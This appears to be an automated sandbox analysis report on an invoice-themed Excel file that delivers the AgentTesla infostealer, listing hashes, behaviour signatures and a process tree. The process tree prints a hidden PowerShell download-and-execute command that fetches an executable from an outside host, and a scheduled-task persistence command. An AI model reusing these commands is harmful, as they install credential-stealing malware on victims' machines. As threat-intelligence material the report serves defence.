Analysis
- max time kernel: 114s
- max time network: 120s
- platform: windows7_x64
- resource: win7
- submitted: 13-07-2020 14:17
Static task: static1
Behavioral task: behavioral1
- Sample: INV+PL+BL-489492020.xls
- Resource: win7
Behavioral task: behavioral2
- Sample: INV+PL+BL-489492020.xls
- Resource: win10
General
- Target: INV+PL+BL-489492020.xls
- Size: 192KB
- MD5: b379714e8daaf2673032f31b2a6abb07
- SHA1: b4f97dceff91b030a76dd19e45b91826fd382e86
- SHA256: 4eaaf544257b0465bb8acff69b987abf00bd19a32fbc45bc0e57b8c66244553a
- SHA512: 11e3989a2641872fb9a08f9d6d6af330eab9cc4c28a84b6801cfe91c56bc5c7fc224265e2afc6661a96cd8b71bd7298e53ae6b3440b4048600c15d131e6db6a4
Malware Config
- Extracted URL: http://crogtrt.com/i7/15601277.jpg
Signatures
- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes:
  - cmd.exe (PID 452), parent EXCEL.EXE (PID 608): Parent C:\Program Files\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process
- Loads dropped DLL (1 IoC)
  Processes:
  - dfge.exe (PID 1312)
- Reads user/profile data of local email clients (2 TTPs)
  Email clients store some user data on disk where infostealers will often target it.
- Office loads VBA resources, possible macro or embedded object present
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Reads data files stored by FTP clients (2 TTPs)
  Tries to access configuration files associated with programs like FileZilla.
- AgentTesla
  Agent Tesla is a remote access tool (RAT) written in Visual Basic.
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  Processes:
  - EXCEL.EXE (PID 608)
- Suspicious use of WriteProcessMemory (23 IoCs)
  Processes:
  - EXCEL.EXE (PID 608) wrote to memory of cmd.exe (PID 452), 3 times
  - cmd.exe (PID 452) wrote to memory of powershell.exe (PID 296), 3 times
  - powershell.exe (PID 296) wrote to memory of dfge.exe (PID 1312), 4 times
  - dfge.exe (PID 1312) wrote to memory of schtasks.exe (PID 1832), 4 times
  - dfge.exe (PID 1312) wrote to memory of dfge.exe (PID 1888), 9 times
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes:
  - powershell.exe (PID 296): Token: SeDebugPrivilege
  - dfge.exe (PID 1312): Token: SeDebugPrivilege
  - dfge.exe (PID 1888): Token: SeDebugPrivilege
- Suspicious use of SetThreadContext (1 IoC)
  Processes:
  - dfge.exe (PID 1312) set thread context of dfge.exe (PID 1888)
- Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
- Suspicious use of SetWindowsHookEx (4 IoCs)
  Processes:
  - EXCEL.EXE (PID 608), 3 times
  - dfge.exe (PID 1888)
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes:
  - powershell.exe (PID 296), 2 times
  - dfge.exe (PID 1312)
  - dfge.exe (PID 1888), 2 times
- Blacklisted process makes network request (1 IoC)
  Processes:
  - powershell.exe (PID 296), flow 5
- Executes dropped EXE (2 IoCs)
  Processes:
  - dfge.exe (PID 1312)
  - dfge.exe (PID 1888)
Processes (tree; each level is indented under its parent)
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE (PID 608)
  Command line: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\INV+PL+BL-489492020.xls
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of WriteProcessMemory
  - Suspicious use of SetWindowsHookEx
  C:\Windows\system32\cmd.exe (PID 452)
    Command line: cmd /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://crogtrt.com/i7/15601277.jpg',$env:Temp+'\dfge.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\dfge.exe')
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 296)
      Command line: powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://crogtrt.com/i7/15601277.jpg',$env:Temp+'\dfge.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\dfge.exe')
      - Suspicious use of WriteProcessMemory
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses
      - Blacklisted process makes network request
      C:\Users\Admin\AppData\Local\Temp\dfge.exe (PID 1312)
        Command line: "C:\Users\Admin\AppData\Local\Temp\dfge.exe"
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses
        - Executes dropped EXE
        C:\Windows\SysWOW64\schtasks.exe (PID 1832)
          Command line: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LnqbjYKeoN" /XML "C:\Users\Admin\AppData\Local\Temp\tmpA949.tmp"
          - Creates scheduled task(s)
        C:\Users\Admin\AppData\Local\Temp\dfge.exe (PID 1888)
          Command line: "{path}"
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of SetWindowsHookEx
          - Suspicious behavior: EnumeratesProcesses
          - Executes dropped EXE